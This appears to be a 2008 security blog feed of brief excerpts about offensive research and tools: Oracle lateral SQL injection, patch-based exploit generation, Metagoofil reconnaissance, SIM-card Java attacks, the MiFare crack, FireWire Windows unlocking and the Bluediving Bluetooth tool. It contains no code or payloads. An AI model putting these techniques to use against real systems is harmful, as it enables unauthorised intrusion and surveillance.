Lateral SQL injection

•April 28, 2008 • Leave a Comment

“How can an attacker exploit a PL/SQL procedure that doesn’t even take user input? Or how does one do SQL injection using DATE or even NUMBER data types? In the past this has not been possible but as this paper will demonstrate, with a little bit of trickery, you can in the Oracle RDBMS.”


Automated exploits from patches

•April 25, 2008 • Leave a Comment

“The automatic patch-based exploit generation problem is: given a program P and a patched version of the program P’, automatically generate an exploit for the potentially unknown vulnerability present in P but fixed in P’. In this paper, we propose techniques for automatic patch-based exploit generation, and show that our techniques can automatically generate exploits for vulnerable programs based upon patches provided via Windows Update.

In many cases we are able to automatically generate exploits within minutes or less.”


•April 22, 2008 • Leave a Comment

“Metagoofil is an information gathering tool designed for extracting the Meta-Data of public documents (pdf,doc,xls,ppt,etc) available on target/victim websites. It will generate a html page with the results of the Meta-Data extracted, plus a list of potential usernames.”
Download from Packetstorm

Java on SIM cards?

•March 27, 2008 • 1 Comment

“In 2007 two lonely THC researchers set about to install a java applet onto a SIM remotely.
The SIM runs a JVM which is very powerful. It’s possible to open gprs connection, make phone calls or redirect phone calls (e.g. remote phone tapping).”


MiFare RFID encryption hacked

•March 27, 2008 • Leave a Comment

“NXP developed the Mifare Classic RFID (radio frequency identification) chip, which is used in 2 million Dutch building access passes, said ter Horst. One billion passes with the technology have been distributed worldwide, making the security risk a global problem. A spokesperson for the ministry told Webwereld, an IDG affiliate, that it had not yet notified other countries.

The warning comes in a week when two research teams independently demonstrated hacks of the chip’s security algorithm.

On Monday, German researchers Karsten Nohl and Henryk Plötz, who first hacked parts of the chip last December, published a paper demonstrating a way to crack the chip’s encryption technology. The duo declined to publicly demonstrate their hack. “We want to start a discussion first, allowing people to adjust or abandon their systems,” Nohl told Webwereld last week. He added that he would provide a demonstration before June.”

Unlock Windows with Firewire

•March 27, 2008 • Leave a Comment

“A security consultant based in New Zealand has released a tool that can unlock Windows computers in seconds without the need for a password.
… merely by plugging in your Firewire cable and running a command”.

Get the source

Bluediving 0.9

•December 27, 2007 • Leave a Comment

Hi there and greets from 24th Chaos Communication Congress.
Here’s a new release of Bluediving – The next generation Bluetooth security tool.
What’s new in 0.9?

– minor tools compile bugfixes by fireangel148
– minor compile bugfixes by niekt
– minor menu management / sound check bugfix by niekt
– now compiles redfang
– Bugfixes in loop mode
– Scan for specific device type

Click && HF